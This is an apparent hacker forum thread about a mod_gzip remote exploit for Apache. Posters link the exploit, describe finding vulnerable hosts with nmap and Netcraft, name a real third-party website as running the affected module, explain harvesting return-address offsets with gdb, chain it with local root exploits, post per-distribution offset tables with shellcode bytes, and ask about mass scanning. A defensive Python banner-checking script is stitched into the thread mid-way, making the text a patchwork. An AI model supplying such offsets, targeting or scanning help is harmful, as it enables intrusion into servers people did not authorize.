Gurou
PRIVATE and now PUBLIC !!!

mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit

http://www.k-otik.net/exploits/11.20.85mod_gzip.c.php

enjoy
coz
did you read the code?

it's NOT a root sploit... *g*
GhostCow
so...? there are many ways of getting root on machines like the common ptrace exploit or the new linuxconf exploit to create a buffer overflow so that you can use the ptrace one if it is usually blocked by antivirus or some shit....
DarkieD
QUOTE (coz @ Nov 20 2003, 11:28 PM)
did you read the code?

it's NOT a root sploit... *g*

Of course it ain't.
That's with most apache exploits:
u get webuser rights
which is enough to get in locally with local exploits.
GhostCow
i compiled it and it seems to work... but how do i scan for websites with mod_gzip enabled?
-= mAc =-
QUOTE
but how do i scan for websites with mod_gzip enabled?

My question too...
BSDG33K
hmm, just a portscanner that scans the port response, like the last nmap release with the -sV flag


nmap -sV -O -v -P0 host


u can find the OS, and the services running on the remote host
so, just pay attention to the port 80 output, and see if any (mod_gzip) or something like that shows up..

btw, does anybody know how to get more target offsets?

cumps
maxillo
Where can I find more working offsets for this exploit?
shaun2k2
QUOTE

btw, does anybody know how to get more target offsets?

cumps

To get more target information (e.g. offsets for different OSes), install Apache with mod_gzip enabled, and crash it using the technique used in the exploit, except just with garbage rather than shellcode etc. Then just examine the core file with the GNU tool gdb. In GDB, type 'info register esp'. You can assume that you now have the return address. Add that to the exploit, and email to bugtraq.


Thank you for your time.
Shaun.
pupkinvasya
QUOTE

but how do i scan for websites with mod_gzip enabled?


You could try this: www.netcraft.com

Webserver Search
What's that site running?...

www.dream-seed.com Search ....

http://uptime.netcraft.com/up/graph/?host=www.dream-seed.com

OS - Linux
Apache/1.3.27 (Unix) (Vine/Linux) PHP/4.3.3 mod_gzip/1.3.26.1a mod_layout/3.2.1
DoTnEt
QUOTE (pupkinvasya @ Nov 30 2003, 04:25 AM)
QUOTE

but how do i scan for websites with mod_gzip enabled?


You could try this: www.netcraft.com

Webserver Search
What's that site running?...

www.dream-seed.com Search ....

http://uptime.netcraft.com/up/graph/?host=www.dream-seed.com

OS - Linux
Apache/1.3.27 (Unix) (Vine/Linux) PHP/4.3.3 mod_gzip/1.3.26.1a mod_layout/3.2.1

thanks
shaun2k2
The version of mod_gzip would have to be quite old for this exploit to work... It probably won't get you anywhere guys.


-Shaun.
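The banner-based identification discussed above (BSDG33K's nmap -sV suggestion and the Netcraft banner pupkinvasya quoted) and Shaun's remark that the version would have to be quite old both come down to reading the mod_gzip token out of an HTTP Server header and comparing it with the affected range. The Python below is an added example, not code from this thread or from the exploit, for auditing your own servers' banners: it parses versions that carry a trailing letter (1.3.26.1a), compares them, and reports when the banner cannot settle the question. The affected-version bound is a parameter because the thread title writes it as 1.2.26.1a while the quoted Netcraft banner shows mod_gzip/1.3.26.1a; the default bound, the sample headers and every function name are assumptions constructed for the demonstration.

```python
import re
from typing import Dict, Optional, Tuple

# Upper bound of the affected range as a parameter (assumption: the thread title
# says 1.2.26.1a, the Netcraft banner quoted in the thread says 1.3.26.1a).
DEFAULT_AFFECTED_MAX = "1.3.26.1a"

# Constructed sample Server headers; none is a capture from a real host.
# The first mirrors the banner format quoted from Netcraft in the thread.
SAMPLE_HEADERS: Dict[str, str] = {
    "old mod_gzip advertised":
        "Apache/1.3.27 (Unix) (Vine/Linux) PHP/4.3.3 mod_gzip/1.3.26.1a mod_layout/3.2.1",
    "made-up newer mod_gzip":
        "Apache/1.3.29 (Unix) mod_gzip/1.3.99",      # 1.3.99 is a made-up value
    "mod_gzip not advertised":
        "Apache/2.0.48 (Unix) PHP/4.3.4",
    "ServerTokens Prod":
        "Apache",
}

_MOD_GZIP_RE = re.compile(r"\bmod_gzip/(\S+)")
_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)([a-z]*)$")


def parse_version(text: str) -> Tuple[Tuple[int, ...], str]:
    """Split '1.3.26.1a' into ((1, 3, 26, 1), 'a'); the letter suffix may be empty."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    return numbers, m.group(2)


def compare_versions(a: str, b: str) -> int:
    """Return -1, 0 or 1 as a <, ==, > b. Missing trailing components count as 0,
    and a bare number sorts before the same number with a letter suffix."""
    (na, sa), (nb, sb) = parse_version(a), parse_version(b)
    width = max(len(na), len(nb))
    na += (0,) * (width - len(na))
    nb += (0,) * (width - len(nb))
    key_a, key_b = (na, sa), (nb, sb)
    return (key_a > key_b) - (key_a < key_b)


def mod_gzip_version(server_header: str) -> Optional[str]:
    """Extract the version advertised after 'mod_gzip/' in a Server header, if any."""
    m = _MOD_GZIP_RE.search(server_header)
    return m.group(1) if m else None


def assess(server_header: str, affected_max: str = DEFAULT_AFFECTED_MAX) -> Dict[str, str]:
    """Classify one Server header against the affected version bound."""
    version = mod_gzip_version(server_header)
    if version is None:
        # Absence of the token proves nothing: ServerTokens Prod (or a reverse
        # proxy) strips module banners, so the host must be checked another way.
        return {"status": "unknown", "reason": "mod_gzip not advertised in banner"}
    if compare_versions(version, affected_max) <= 0:
        # Even here the banner cannot show whether the module was built with
        # debug_mode, which the advisory title names as a precondition.
        return {"status": "review",
                "reason": f"mod_gzip/{version} is within the affected range "
                          f"(<= {affected_max}); debug_mode build not visible in banner"}
    return {"status": "clear", "reason": f"mod_gzip/{version} is above {affected_max}"}


def assess_all(headers: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Run assess() over a labelled set of headers; returns label -> status."""
    headers = SAMPLE_HEADERS if headers is None else headers
    return {label: assess(header)["status"] for label, header in headers.items()}


if __name__ == "__main__":
    for label, header in SAMPLE_HEADERS.items():
        result = assess(header)
        print(f"{label:28s} {result['status']:8s} {result['reason']}")
```

The "unknown" and "review" outcomes are the point of the check: a host that hides its module list, or one that advertises an affected version but was built without debug_mode, looks the same from the banner, so this is an inventory aid for deciding which hosts to inspect directly, not a verdict on exploitability.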
GhostCow
is there any chance someone can improve this exploit a notch and post it here? i would do it but... i don't know C at all!
SKyLiNe
QUOTE (GhostCow @ Nov 21 2003, 08:16 AM)
so...? there are many ways of getting root on machines like the common ptrace exploit or the new linuxconf exploit to create a buffer overflow so that you can use the ptrace one if it is usually blocked by antivirus or some shit....

Lol sounds interesting, too bad it doesn't make any sense
GhostCow
unfortunately i don't know what the hell i talk about usually...
ummm please forgive my blunt ignorance, i am used to running ptrace exploits on redhat 7.2 or 7.3 boxes and actually getting them to work...
so that about sums up my knowledge in linux exploits... the linux conf exploit that i speak of is:
* Linuxconf <= 1.28r3 local xploit
* by RaiSe <raise@netsearch-ezine.com>

can be viewed here

this is for RedHat 7.3 and Mandrake 8.0 and 8.2 dist.

so thats about it ....
on boxes that the ptrace gets killed (i don't know by what, could be privileges or whatever) i use the linuxconf one to create the buffer overflow which doesn't get me root and then i open the ptrace exploit again and it attaches the shellcode perfectly...

so skyline i'm sorry if i didn't make any sense to anyone, i apologize for my ignorance....
icedealer
j0 girls i found some offsets....

here ya go...

{"RedHat 9.0", // flavour info
0xbfffc8a2, // ret_addr in stack
0x31823610, // address of stderr
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3"},

{"RedHat 8.0", // flavour info
0xbfffd8f0, // ret_addr in stack
0x42127480, // address of stderr
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"},

{"RedHat 7.3", // flavour info
0xbffcf610, // ret_addr in stack
0x42131806, // address of stderr
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"},

{"SuSe 8.1", // flavour info
0xbfc917c0, // ret_addr in stack
0x58184617, // address of stderr
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3"},

{"Mandrake 9.1", // flavour info
0xbc04172f, // ret_addr in stack
0x41196735, // address of stderr
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3"},

have fun
GhostCow
thanks for the offsets...
anyone know how to scan for this? like i mean MASS scanning?
Invision Power Board © 2001-2005 Invision Power Services, Inc.